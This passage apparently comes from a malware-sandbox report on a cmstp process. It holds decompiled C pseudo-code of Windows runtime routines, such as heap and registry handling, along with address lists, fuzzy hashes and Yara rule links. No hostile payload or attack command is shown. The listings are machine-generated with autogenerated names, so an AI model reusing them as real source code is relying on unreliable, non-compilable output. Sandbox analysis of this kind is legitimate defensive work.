									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L050F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05119650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x050dc608
0x050dc615
0x050dc625
0x050dc62d
0x050dc635
0x050dc640
0x050dc680
0x050dc687
0x050dc688
0x050dc689
0x050dc694
0x050dc694
0x050dc642
0x050dc64a
0x050dc697
0x05147a25
0x05147a2b
0x05147a2e
0x05147a30
0x05147bea
0x05147bea
0x00000000
0x05147bea
0x05147a36
0x05147a43
0x05147a48
0x05147a4c
0x05147a4e
0x00000000
0x00000000
0x05147a58
0x05147a5a
0x05147a5b
0x05147a5c
0x05147a5d
0x05147a63
0x05147a64
0x05147a6a
0x05147a6c
0x05147a6e
0x051479cb
0x051479cb
0x051479ce
0x051479d0
0x05147a98
0x05147a9b
0x05147a9b
0x05147a9e
0x05147aa1
0x05147bbe
0x05147bbe
0x05147bc0
0x05147be0
0x05147be0
0x05147a01
0x05147a01
0x05147a05
0x05147a07
0x05147a15
0x05147a15
0x05147a1a
0x00000000
0x05147a1a
0x05147bc2
0x05147bc6
0x05147bc9
0x05147bcd
0x05147bcf
0x051479e6
0x051479e6
0x051479eb
0x051479eb
0x051479ef
0x051479f1
0x00000000
0x00000000
0x051479f3
0x051479f5
0x051479ff
0x051479ff
0x00000000
0x051479ff
0x051479f7
0x051479fd
0x00000000
0x00000000
0x00000000
0x051479fd
0x05147bd5
0x05147bd8
0x00000000
0x00000000
0x05147ba9
0x05147bac
0x05147bb0
0x05147bb1
0x05147bb1
0x05147bb6
0x00000000
0x05147bb6
0x05147aa7
0x05147aaa
0x00000000
0x00000000
0x05147ab2
0x05147ab3
0x05147ab5
0x05147aec
0x05147aef
0x05147b25
0x05147b28
0x05147b62
0x05147b64
0x05147b8f
0x05147b92
0x05147b96
0x05147b98
0x00000000
0x00000000
0x05147b9e
0x05147b9f
0x05147ba3
0x00000000
0x05147ba3
0x05147b66
0x05147b68
0x05147ae2
0x05147ae2
0x00000000
0x05147ae2
0x05147b6e
0x05147b72
0x05147b75
0x05147b81
0x05147b85
0x05147b87
0x00000000
0x00000000
0x05147b31
0x05147b34
0x05147b3c
0x05147b45
0x05147b46
0x05147b4f
0x05147b51
0x05147b57
0x05147b59
0x05147b59
0x00000000
0x05147b59
0x05147b77
0x00000000
0x05147b77
0x05147b2a
0x00000000
0x05147b2a
0x05147af1
0x05147af3
0x00000000
0x00000000
0x05147afb
0x05147afc
0x05147afe
0x00000000
0x00000000
0x05147b00
0x05147b03
0x00000000
0x00000000
0x05147b05
0x05147b09
0x05147b0d
0x05147b0f
0x00000000
0x00000000
0x05147b18
0x05147b1d
0x00000000
0x05147b1d
0x05147ab7
0x05147ab9
0x00000000
0x00000000
0x05147abf
0x05147ac1
0x00000000
0x00000000
0x05147ac3
0x05147ac6
0x00000000
0x00000000
0x05147ac8
0x05147acc
0x05147ad0
0x05147ad2
0x00000000
0x00000000
0x05147adb
0x00000000
0x05147adb
0x051479d6
0x051479d9
0x051479dc
0x05147a91
0x05147a94
0x00000000
0x05147a94
0x051479e2
0x00000000
0x051479e2
0x05147a74
0x05147a7a
0x00000000
0x00000000
0x05147a8a
0x05147a21
0x05147a21
0x00000000
0x05147a21
0x050dc650
0x050dc651
0x050dc656
0x050dc65c
0x050dc65d
0x050dc663
0x050dc664
0x050dc66a
0x050dc66e
0x051479c5
0x051479c7
0x00000000
0x051479c7
0x050dc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea7ba681a0bb5fa50e9f3afef1293aa0bef5b558771ed3c03c2b31571394130c
Instruction ID: 5ff789098c5d896608633cfeba040d1129cb4136b704632457a10c1da519662c
Opcode Fuzzy Hash: ea7ba681a0bb5fa50e9f3afef1293aa0bef5b558771ed3c03c2b31571394130c
Instruction Fuzzy Hash: E88180756482419FDB25CE14C880E7EB7A6FF84264F29586AED459B281D330ED42CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0510138B Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0510138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E05100678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E05119660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E050F7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0519138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E051016C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E0519A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E050FB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E050FA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E0519A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}

0x0510139f
0x051013a1
0x051013a4
0x051013a6
0x051013ab
0x051013b3
0x05145522
0x00000000
0x05145522
0x051013b9
0x051013c1
0x051013c4
0x051013cd
0x051013d0
0x051013d9
0x051013dc
0x051013df
0x051013e4
0x0514552b
0x00000000
0x00000000
0x05145534
0x0514553f
0x05145545
0x05145549
0x0514554a
0x0514554f
0x05145550
0x05145559
0x0514551c
0x00000000
0x0514551c
0x05145562
0x05145574
0x05145564
0x0514556d
0x0514556d
0x0514557c
0x05145597
0x05145597
0x0514559f
0x051455a2
0x051455a5
0x051455a5
0x051013ec
0x051013f2
0x051013f4
0x051013f8
0x051013fe
0x05101400
0x05101406
0x05101412
0x05101419
0x051455b0
0x051455b5
0x051455b8
0x051455b8
0x05101425
0x05101429
0x0510142c
0x0510142f
0x05101432
0x05101435
0x0510143a
0x0510143d
0x05101443
0x05101446
0x05101449
0x05101450
0x05101453
0x05101459
0x0510145f
0x05101462
0x05101467
0x051014fa
0x0510146d
0x0510146d
0x0510146d
0x0510146f
0x05101479
0x05101480
0x05101507
0x05101508
0x05101510
0x051455c1
0x051455c2
0x051455cc
0x051455d1
0x051455d4
0x051455d7
0x051455d7
0x05101482
0x05101482
0x05101482
0x05101484
0x0510149b
0x051014a4
0x051014ae
0x051014b4
0x051014b4
0x051014ba
0x051014c4
0x051014c4
0x051014c9
0x051014cf
0x051014d2
0x051014d7
0x051455df
0x051455e0
0x051455ea
0x051014dd
0x051014dd
0x051014df
0x051014e2
0x051014e4
0x051014e4
0x051014e7
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: 1ded0a3e2cd1f6128446e1f59805834a5145fddbec42afc61b3a1fd9db51603b
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: 33818D75A00745AFCB24CF68C844BAABBF6FF48300F118569E956C7791D374EA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05156DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E05156DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05156B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E050F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05119AE0();
					_t87 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0515795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0515795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0515795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0515795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L050F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05156B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05156B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05156B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05156B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E050F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05119AE0();
								L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L050F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L050F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L050F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L050F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x05156dd4
0x05156dde
0x05156de1
0x05156de3
0x05156de6
0x05156de9
0x05156dec
0x05156def
0x05156df2
0x05156df5
0x05156dfe
0x05156e04
0x05156e09
0x05156e0d
0x05156e18
0x05156e1b
0x05156e22
0x05156e2d
0x05156e30
0x05156e36
0x05156e42
0x05156e4d
0x05156e50
0x05156e55
0x05156e5c
0x05156e6e
0x05156e5e
0x05156e67
0x05156e67
0x05156e73
0x05156e74
0x05156e77
0x05156e7c
0x05156e7d
0x05156e8e
0x05156e93
0x05156e9c
0x05156ea8
0x05156eab
0x05156eac
0x05156eb3
0x05156ecd
0x05156edc
0x05156ee2
0x05156ee5
0x05156ef2
0x05156efb
0x05156f01
0x05156f06
0x05156f0b
0x05156f11
0x05156f1a
0x05156f22
0x05156f26
0x05156f26
0x05156f33
0x05156f41
0x05156f44
0x05156f47
0x05156f54
0x05156f65
0x05156f77
0x05156f7c
0x05156f82
0x05156f91
0x05156f99
0x05156fa3
0x05156fae
0x05156fae
0x05156fba
0x05156fbb
0x05156fbc
0x05156fc1
0x05156fc2
0x05156fd3
0x05156fd8
0x05156fd8
0x05156fdf
0x05156fe8
0x05156fee
0x05156fee
0x05156ff5
0x05156ffb
0x05156ffb
0x05157004
0x00000000
0x0515700a
0x05157004
0x05156eb3
0x05156e9c
0x05157015

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 33398225ae618680a698479cf102de6a0894eaeb55975b35da4607d5e8cacdaf
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: FF717C71E00619EFCB11DFA4D984AEEBBB9FF48710F104069E915E7291DB34AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0516B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0516B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x51c7b9c; // 0x0
				_t124 = L050F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05119800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E051195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E051195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L050F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05119910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E051195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x51c7b9c; // 0x0
									_t92 = L050F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05119910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E050DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0516E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0516E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E051195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0516b8d9
0x0516b8e4
0x00000000
0x0516b8e6
0x0516b8f3
0x0516b8f5
0x0516b8f5
0x0516b8f8
0x0516b920
0x0516b924
0x0516b936
0x0516b939
0x0516b93d
0x0516b948
0x0516b9a0
0x0516b9a0
0x0516b9a4
0x0516b9bf
0x0516b9c4
0x0516b9c6
0x0516b9cd
0x0516b9d1
0x0516bad4
0x0516bad8
0x0516bada
0x0516badc
0x0516badc
0x0516badf
0x0516bae0
0x0516bae2
0x0516bae4
0x0516baec
0x0516baee
0x0516baf0
0x0516baf0
0x0516baec
0x0516bafb
0x0516bafc
0x0516bafe
0x0516bb01
0x0516bb01
0x00000000
0x0516bb06
0x0516b9d7
0x0516b9db
0x0516b9db
0x0516b9de
0x0516b9de
0x0516b9e4
0x0516b9e7
0x0516b9ea
0x0516b9ec
0x0516b9ef
0x0516b9f3
0x0516ba1b
0x0516ba1b
0x0516ba23
0x0516ba24
0x0516ba27
0x0516ba2a
0x0516ba2b
0x0516ba2e
0x0516ba30
0x0516ba37
0x0516ba3f
0x0516ba9c
0x0516baa2
0x0516bb13
0x0516bb15
0x0516baae
0x0516baae
0x0516bab3
0x0516bab5
0x0516baba
0x0516bac8
0x0516bac8
0x0516baba
0x0516bacd
0x0516bacf
0x00000000
0x0516bacf
0x0516bb1a
0x00000000
0x0516bb1c
0x0516baa7
0x0516bb11
0x00000000
0x0516bb11
0x0516baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0516ba41
0x0516ba41
0x0516ba41
0x0516ba58
0x0516ba5d
0x0516ba62
0x00000000
0x00000000
0x0516ba64
0x0516ba67
0x0516ba68
0x0516ba69
0x0516ba6c
0x0516ba6f
0x0516ba71
0x0516ba78
0x0516ba80
0x00000000
0x00000000
0x0516ba90
0x0516ba90
0x0516ba97
0x00000000
0x0516ba97
0x0516b9f5
0x0516b9f7
0x0516b9f7
0x0516b9fa
0x0516ba03
0x0516ba07
0x0516ba0c
0x0516ba10
0x0516ba17
0x00000000
0x0516b9f7
0x0516b9a6
0x0516b9a8
0x0516b9af
0x0516b9b3
0x00000000
0x00000000
0x0516b9b9
0x00000000
0x0516b9b9
0x0516b94d
0x0516b98f
0x0516b995
0x0516b999
0x0516b960
0x0516b967
0x0516b968
0x0516b96a
0x00000000
0x0516b96a
0x0516b99b
0x0516b99e
0x00000000
0x00000000
0x00000000
0x0516b99e
0x0516b951
0x0516b954
0x0516b95a
0x0516b95e
0x0516b972
0x0516b979
0x0516b97d
0x0516b97f
0x0516b980
0x0516b982
0x0516b984
0x00000000
0x0516b984
0x00000000
0x0516b926
0x00000000
0x0516b926

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3cd0174633e0544d03462bf4392c9738d5ebc7c32c611bedee837b4063012c
Instruction ID: 6f6a83719276ed30cda1f79b74f079098835d6883705264723ba377b0f2e3105
Opcode Fuzzy Hash: ef3cd0174633e0544d03462bf4392c9738d5ebc7c32c611bedee837b4063012c
Instruction Fuzzy Hash: B5710076208701AFD731DF14C888FAAB7F6FB40720F154528EA56C76A0DB71E950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 050D52A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E050D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E050EEEF0(0x51c79a0);
					_t104 =  *0x51c8210; // 0x33a2ba8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E050EEB70(_t93, 0x51c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E05119890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E050EEEF0(0x51c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E050EEB70(0, 0x51c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x3a2bc002
								_t13 = _t104 + 0xc; // 0x33a2bb5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0510F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
